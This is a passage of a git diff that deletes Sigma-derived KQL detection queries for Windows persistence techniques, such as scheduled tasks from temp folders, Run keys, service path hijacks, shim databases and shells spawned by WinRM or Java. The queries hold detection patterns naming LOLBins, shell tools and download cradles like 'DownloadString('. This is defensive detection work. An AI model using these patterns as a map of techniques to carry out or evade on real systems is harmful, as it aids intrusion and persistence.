attack.privilege_escalation -DeviceProcessEvents -| where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\java.exe" \ No newline at end of file diff --git a/Persistence/Suspicious_Processes_Spawned_by_WinRM.kql b/Persistence/Suspicious_Processes_Spawned_by_WinRM.kql deleted file mode 100644 index 156ae6e7..00000000 --- a/Persistence/Suspicious_Processes_Spawned_by_WinRM.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Andreas Hunkeler (@Karneades), Markus Neis -// Date: 2021/05/20 -// Level: high -// Description: Detects suspicious processes including shells spawnd from WinRM host process -// Tags: attack.t1190, attack.initial_access, attack.persistence, attack.privilege_escalation -DeviceProcessEvents -| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe") and InitiatingProcessFolderPath endswith "\\wsmprovhost.exe" \ No newline at end of file diff --git a/Persistence/Suspicious_Run_Key_from_Download.kql b/Persistence/Suspicious_Run_Key_from_Download.kql deleted file mode 100644 index a2012d01..00000000 --- a/Persistence/Suspicious_Run_Key_from_Download.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/10/01 -// Level: high -// Description: Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories -// Tags: attack.persistence, attack.t1547.001 -DeviceRegistryEvents -| where (InitiatingProcessFolderPath contains "\\Downloads\\" or InitiatingProcessFolderPath contains "\\Temporary Internet Files\\Content.Outlook\\" or InitiatingProcessFolderPath contains "\\Local Settings\\Temporary Internet Files\\") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" \ No newline at end of file diff --git a/Persistence/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql b/Persistence/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql deleted file mode 100644 index 00359f36..00000000 --- a/Persistence/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/03/11 -// Level: high -// Description: Detects the creation of scheduled tasks that involves a temporary folder and runs only once -// Tags: attack.execution, attack.persistence, attack.t1053.005 -DeviceProcessEvents -| where (ProcessCommandLine contains " /create " and ProcessCommandLine contains " /sc once " and ProcessCommandLine contains "\\Temp\\") and FolderPath endswith "\\schtasks.exe" \ No newline at end of file diff --git a/Persistence/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql b/Persistence/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql deleted file mode 100644 index 55ba5abb..00000000 --- a/Persistence/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Swachchhanda Shrawan Poudel, Elastic (idea) -// Date: 2023/04/20 -// Level: medium -// Description: Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence -// Tags: attack.defense_evasion, attack.persistence, attack.t1036.005, attack.t1053.005 -DeviceProcessEvents -| where ((ProcessCommandLine contains "/create" or ProcessCommandLine contains "-create") and (ProcessCommandLine contains "/xml" or ProcessCommandLine contains "-xml") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains ".xml" or ((InitiatingProcessCommandLine contains ":\\WINDOWS\\Installer\\MSI" and InitiatingProcessCommandLine contains ".tmp,zzzzInvokeManagedCustomActionOutOfProc") and InitiatingProcessFolderPath endswith "\\rundll32.exe") or ProcessIntegrityLevel =~ "System"))) and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\OEM\\UpgradeTool\\CareCenter_" and InitiatingProcessFolderPath contains "\\BUnzip\\Setup_msi.exe") or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Camera Station\\SetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Device Manager\\AdmSetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Zemana\\AntiMalware\\AntiMalware.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Dell\\SupportAssist\\pcdrcui.exe"))) \ No newline at end of file diff --git a/Persistence/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql b/Persistence/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql deleted file mode 100644 index 6ba5044f..00000000 --- a/Persistence/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/11/16 -// Level: high -// Description: Detects the creation of tasks from processes executed from suspicious locations -// Tags: attack.persistence, attack.execution, attack.t1053 -DeviceFileEvents -| where (InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "C:\\PerfLogs" or InitiatingProcessFolderPath contains "\\Windows\\System32\\config\\systemprofile") and FolderPath contains "\\Windows\\System32\\Tasks" \ No newline at end of file diff --git a/Persistence/Suspicious_Schtasks_Execution_AppData_Folder.kql b/Persistence/Suspicious_Schtasks_Execution_AppData_Folder.kql deleted file mode 100644 index fe01afd0..00000000 --- a/Persistence/Suspicious_Schtasks_Execution_AppData_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/03/15 -// Level: high -// Description: Detects the creation of a schtask that executes a file from C:\Users\\AppData\Local -// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001 -DeviceProcessEvents -| where ((ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ") and (ProcessCommandLine contains "/Create" and ProcessCommandLine contains "/RU" and ProcessCommandLine contains "/TR" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\") and FolderPath endswith "\\schtasks.exe") and (not((ProcessCommandLine contains "/TN TVInstallRestore" and FolderPath endswith "\\schtasks.exe" and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "TeamViewer_.exe")))) \ No newline at end of file diff --git a/Persistence/Suspicious_Screensaver_Binary_File_Creation.kql b/Persistence/Suspicious_Screensaver_Binary_File_Creation.kql deleted file mode 100644 index 973b874b..00000000 --- a/Persistence/Suspicious_Screensaver_Binary_File_Creation.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113 -// Date: 2021/12/29 -// Level: medium -// Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity. -Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension - -// Tags: attack.persistence, attack.t1546.002 -DeviceFileEvents -| where FolderPath endswith ".scr" and (not(((InitiatingProcessFolderPath endswith "\\Kindle.exe" or InitiatingProcessFolderPath endswith "\\Bin\\ccSvcHst.exe") or (InitiatingProcessFolderPath endswith "\\TiWorker.exe" and FolderPath endswith "\\uwfservicingscr.scr")))) \ No newline at end of file diff --git a/Persistence/Suspicious_Service_DACL_Modification_Via_Set-Service_Cmdlet.kql b/Persistence/Suspicious_Service_DACL_Modification_Via_Set-Service_Cmdlet.kql deleted file mode 100644 index ccf4a3ab..00000000 --- a/Persistence/Suspicious_Service_DACL_Modification_Via_Set-Service_Cmdlet.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/10/18 -// Level: high -// Description: Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable -// Tags: attack.persistence, attack.t1543.003 -DeviceProcessEvents -| where (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and ((ProcessCommandLine contains ";;;IU" or ProcessCommandLine contains ";;;SU" or ProcessCommandLine contains ";;;BA" or ProcessCommandLine contains ";;;SY" or ProcessCommandLine contains ";;;WD") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "D;;")) \ No newline at end of file diff --git a/Persistence/Suspicious_Service_Path_Modification.kql b/Persistence/Suspicious_Service_Path_Modification.kql deleted file mode 100644 index f0c3811c..00000000 --- a/Persistence/Suspicious_Service_Path_Modification.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019/10/21 -// Level: high -// Description: Detects service path modification via the "sc" binary to a suspicious command or path -// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003 -DeviceProcessEvents -| where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd /r" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp") and (ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe" \ No newline at end of file diff --git a/Persistence/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql b/Persistence/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql deleted file mode 100644 index a6b5d758..00000000 --- a/Persistence/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Andreas Hunkeler (@Karneades) -// Date: 2021/12/22 -// Level: high -// Description: Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation) -// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation -DeviceProcessEvents -| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") and InitiatingProcessFolderPath endswith "\\keytool.exe" \ No newline at end of file diff --git a/Persistence/Suspicious_Shim_Database_Patching_Activity.kql b/Persistence/Suspicious_Shim_Database_Patching_Activity.kql deleted file mode 100644 index 1df15c46..00000000 --- a/Persistence/Suspicious_Shim_Database_Patching_Activity.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/01 -// Level: high -// Description: Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence. -// Tags: attack.persistence, attack.t1546.011 -DeviceRegistryEvents -| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom" and (RegistryKey endswith "\\csrss.exe" or RegistryKey endswith "\\dllhost.exe" or RegistryKey endswith "\\explorer.exe" or RegistryKey endswith "\\RuntimeBroker.exe" or RegistryKey endswith "\\services.exe" or RegistryKey endswith "\\sihost.exe" or RegistryKey endswith "\\svchost.exe" or RegistryKey endswith "\\taskhostw.exe" or RegistryKey endswith "\\winlogon.exe" or RegistryKey endswith "\\WmiPrvSe.exe") \ No newline at end of file diff --git a/Persistence/Suspicious_Startup_Folder_Persistence.kql b/Persistence/Suspicious_Startup_Folder_Persistence.kql deleted file mode 100644 index b30c57ba..00000000 --- a/Persistence/Suspicious_Startup_Folder_Persistence.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/10 -// Level: high -// Description: Detects when a file with a suspicious extension is created in the startup folder -// Tags: attack.persistence, attack.t1547.001 -DeviceFileEvents -| where FolderPath contains "\\Windows\\Start Menu\\Programs\\Startup\\" and (FolderPath endswith ".vbs" or FolderPath endswith ".vbe" or FolderPath endswith ".bat" or FolderPath endswith ".ps1" or FolderPath endswith ".hta" or FolderPath endswith ".dll" or FolderPath endswith ".jar" or FolderPath endswith ".msi" or FolderPath endswith ".scr" or FolderPath endswith ".cmd") \ No newline at end of file diff --git a/Persistence/Suspicious_WindowsTerminal_Child_Processes.kql b/Persistence/Suspicious_WindowsTerminal_Child_Processes.kql deleted file mode 100644 index 04afff03..00000000 --- a/Persistence/Suspicious_WindowsTerminal_Child_Processes.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/25 -// Level: medium -// Description: Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section) -// Tags: attack.execution, attack.persistence -DeviceProcessEvents -| where ((InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe" or InitiatingProcessFolderPath endswith "\\wt.exe") and ((FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\csc.exe") or (FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Windows\\TEMP\\") or (ProcessCommandLine contains " iex " or ProcessCommandLine contains " icm" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo " or ProcessCommandLine contains "DownloadString(" or ProcessCommandLine contains " /c " or ProcessCommandLine contains " /k " or ProcessCommandLine contains " /r "))) and (not(((ProcessCommandLine contains "Import-Module" and ProcessCommandLine contains "Microsoft.VisualStudio.DevShell.dll" and ProcessCommandLine contains "Enter-VsDevShell") or (ProcessCommandLine contains "\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_" and ProcessCommandLine contains "\\LocalState\\settings.json") or (ProcessCommandLine contains "C:\\Program Files\\Microsoft Visual Studio\\" and ProcessCommandLine contains "\\Common7\\Tools\\VsDevCmd.bat")))) \ No newline at end of file diff --git a/Persistence/Suspicious_desktop.ini_Action.kql b/Persistence/Suspicious_desktop.ini_Action.kql deleted file mode 100644 index 7c92db8d..00000000 --- a/Persistence/Suspicious_desktop.ini_Action.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO) -// Date: 2020/03/19 -// Level: medium -// Description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk. -// Tags: attack.persistence, attack.t1547.009 -DeviceFileEvents -| where FolderPath endswith "\\desktop.ini" and (not(((InitiatingProcessFolderPath startswith "C:\\Windows\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\JetBrains\\Toolbox\\bin\\7z.exe" and FolderPath contains "\\JetBrains\\apps\\") or FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\"))) \ No newline at end of file diff --git a/Persistence/Sysinternals_PsService_Execution.kql b/Persistence/Sysinternals_PsService_Execution.kql deleted file mode 100644 index f02b57a4..00000000 --- a/Persistence/Sysinternals_PsService_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/16 -// Level: medium -// Description: Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering -// Tags: attack.discovery, attack.persistence, attack.t1543.003 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "psservice.exe" or (FolderPath endswith "\\PsService.exe" or FolderPath endswith "\\PsService64.exe") \ No newline at end of file diff --git a/Persistence/Sysinternals_PsSuspend_Execution.kql b/Persistence/Sysinternals_PsSuspend_Execution.kql deleted file mode 100644 index fe4d7335..00000000 --- a/Persistence/Sysinternals_PsSuspend_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/03/23 -// Level: medium -// Description: Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes -// Tags: attack.discovery, attack.persistence, attack.t1543.003 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "pssuspend.exe" or (FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe") \ No newline at end of file diff --git a/Persistence/System_Scripts_Autorun_Keys_Modification.kql b/Persistence/System_Scripts_Autorun_Keys_Modification.kql deleted file mode 100644 index a6f88a0b..00000000 --- a/Persistence/System_Scripts_Autorun_Keys_Modification.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019/10/25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// Tags: attack.persistence, attack.t1547.001 -DeviceRegistryEvents -| where RegistryKey contains "\\Software\\Policies\\Microsoft\\Windows\\System\\Scripts" and (RegistryKey contains "\\Startup" or RegistryKey contains "\\Shutdown" or RegistryKey contains "\\Logon" or RegistryKey contains "\\Logoff") and (not(RegistryValueData =~ "(Empty)")) \ No newline at end of file diff --git a/Persistence/Tasks_Folder_Evasion.kql b/Persistence/Tasks_Folder_Evasion.kql deleted file mode 100644 index 057c6541..00000000 --- a/Persistence/Tasks_Folder_Evasion.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Sreeman -// Date: 2020/01/13 -// Level: high -// Description: The Tasks folder in system32 and syswow64 are globally writable paths. -Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application -in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr - -// Tags: attack.defense_evasion, attack.persistence, attack.execution, attack.t1574.002 -DeviceProcessEvents -| where (ProcessCommandLine contains "echo " or ProcessCommandLine contains "copy " or ProcessCommandLine contains "type " or ProcessCommandLine contains "file createnew") and (ProcessCommandLine contains " C:\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains " C:\\Windows\\SysWow64\\Tasks\\") \ No newline at end of file diff --git a/Persistence/Third_Party_Software_DLL_Sideloading.kql b/Persistence/Third_Party_Software_DLL_Sideloading.kql deleted file mode 100644 index 15cbb1e6..00000000 --- a/Persistence/Third_Party_Software_DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/08/17 -// Level: medium -// Description: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc) -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\commfunc.dll" and (not((FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\" or (FolderPath startswith "C:\\Program Files\\Lenovo\\Communications Utility\\" or FolderPath startswith "C:\\Program Files (x86)\\Lenovo\\Communications Utility\\"))))) or (FolderPath endswith "\\tosbtkbd.dll" and (not((FolderPath startswith "C:\\Program Files\\Toshiba\\Bluetooth Toshiba Stack\\" or FolderPath startswith "C:\\Program Files (x86)\\Toshiba\\Bluetooth Toshiba Stack\\")))) \ No newline at end of file diff --git a/Persistence/UAC_Bypass_With_Fake_DLL.kql b/Persistence/UAC_Bypass_With_Fake_DLL.kql deleted file mode 100644 index ea6ebd96..00000000 --- a/Persistence/UAC_Bypass_With_Fake_DLL.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: oscd.community, Dmitry Uchakin -// Date: 2020/10/06 -// Level: high -// Description: Attempts to load dismcore.dll after dropping it -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\dismcore.dll" and InitiatingProcessFolderPath endswith "\\dism.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\Dism\\dismcore.dll")) \ No newline at end of file diff --git a/Persistence/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql b/Persistence/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql deleted file mode 100644 index b24cd1fc..00000000 --- a/Persistence/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/18 -// Level: high -// Description: Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method -// Tags: attack.persistence, attack.defense_evasion, attack.t1542.001 -DeviceFileEvents -| where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe" \ No newline at end of file diff --git a/Persistence/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql b/Persistence/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql deleted file mode 100644 index dba934a8..00000000 --- a/Persistence/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/18 -// Level: high -// Description: Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section -// Tags: attack.persistence, attack.defense_evasion, attack.t1542.001 -DeviceProcessEvents -| where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe" \ No newline at end of file diff --git a/Persistence/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql b/Persistence/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql deleted file mode 100644 index 6f462ae1..00000000 --- a/Persistence/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/01 -// Level: medium -// Description: Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. -Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims - -// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.011 -DeviceProcessEvents -| where (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe") and (not((ProcessCommandLine =~ "" or ProcessCommandLine contains ".sdb" or isnull(ProcessCommandLine) or ((ProcessCommandLine endswith " -c" or ProcessCommandLine endswith " -f" or ProcessCommandLine endswith " -mm" or ProcessCommandLine endswith " -t") or ProcessCommandLine contains " -m -bg")))) \ No newline at end of file diff --git a/Persistence/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql b/Persistence/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql deleted file mode 100644 index 63e818d3..00000000 --- a/Persistence/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems) -// Date: 2022/07/15 -// Level: high -// Description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00 -// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.t1053.005 -DeviceProcessEvents -| where (ProcessCommandLine contains "wscript" or ProcessCommandLine contains "vbscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "regsvr32.exe" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "\\AppData\\") and (FolderPath contains "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "once" and ProcessCommandLine contains "00:00") \ No newline at end of file diff --git a/Persistence/Uncommon_Userinit_Child_Process.kql b/Persistence/Uncommon_Userinit_Child_Process.kql deleted file mode 100644 index 6b52304c..00000000 --- a/Persistence/Uncommon_Userinit_Child_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tom Ueltschi (@c_APT_ure), Tim Shelton -// Date: 2019/01/12 -// Level: high -// Description: Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence. -// Tags: attack.t1037.001, attack.persistence -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\userinit.exe" and (not(FolderPath endswith ":\\WINDOWS\\explorer.exe")) and (not(((FolderPath endswith ":\\Program Files (x86)\\Citrix\\HDX\\bin\\cmstart.exe" or FolderPath endswith ":\\Program Files (x86)\\Citrix\\HDX\\bin\\icast.exe" or FolderPath endswith ":\\Program Files (x86)\\Citrix\\System32\\icast.exe" or FolderPath endswith ":\\Program Files\\Citrix\\HDX\\bin\\cmstart.exe" or FolderPath endswith ":\\Program Files\\Citrix\\HDX\\bin\\icast.exe" or FolderPath endswith ":\\Program Files\\Citrix\\System32\\icast.exe") or isnull(FolderPath) or (ProcessCommandLine contains "netlogon.bat" or ProcessCommandLine contains "UsrLogon.cmd") or (FolderPath endswith ":\\Windows\\System32\\proquota.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\proquota.exe") or ProcessCommandLine =~ "PowerShell.exe"))) \ No newline at end of file diff --git a/Persistence/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql b/Persistence/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql deleted file mode 100644 index 61f33107..00000000 --- a/Persistence/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/31 -// Level: medium -// Description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages -// Tags: attack.persistence, attack.defense_evasion -DeviceProcessEvents -| where (ProcessCommandLine contains "Add-AppPackage " or ProcessCommandLine contains "Add-AppxPackage ") and ProcessCommandLine contains " -AllowUnsigned" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/Persistence/User_Added_To_Highly_Privileged_Group.kql b/Persistence/User_Added_To_Highly_Privileged_Group.kql deleted file mode 100644 index 5ffd354c..00000000 --- a/Persistence/User_Added_To_Highly_Privileged_Group.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024/02/23 -// Level: high -// Description: Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember". -// Tags: attack.persistence, attack.t1098 -DeviceProcessEvents -| where (ProcessCommandLine contains "Group Policy Creator Owners" or ProcessCommandLine contains "Schema Admins") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group ")) \ No newline at end of file diff --git a/Persistence/User_Added_to_Local_Administrators_Group.kql b/Persistence/User_Added_to_Local_Administrators_Group.kql deleted file mode 100644 index 7cd2e84d..00000000 --- a/Persistence/User_Added_to_Local_Administrators_Group.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/12 -// Level: medium -// Description: Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember". -// Tags: attack.persistence, attack.t1098 -DeviceProcessEvents -| where (ProcessCommandLine contains " administrators " or ProcessCommandLine contains " administrateur") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group ")) \ No newline at end of file diff --git a/Persistence/User_Added_to_Remote_Desktop_Users_Group.kql 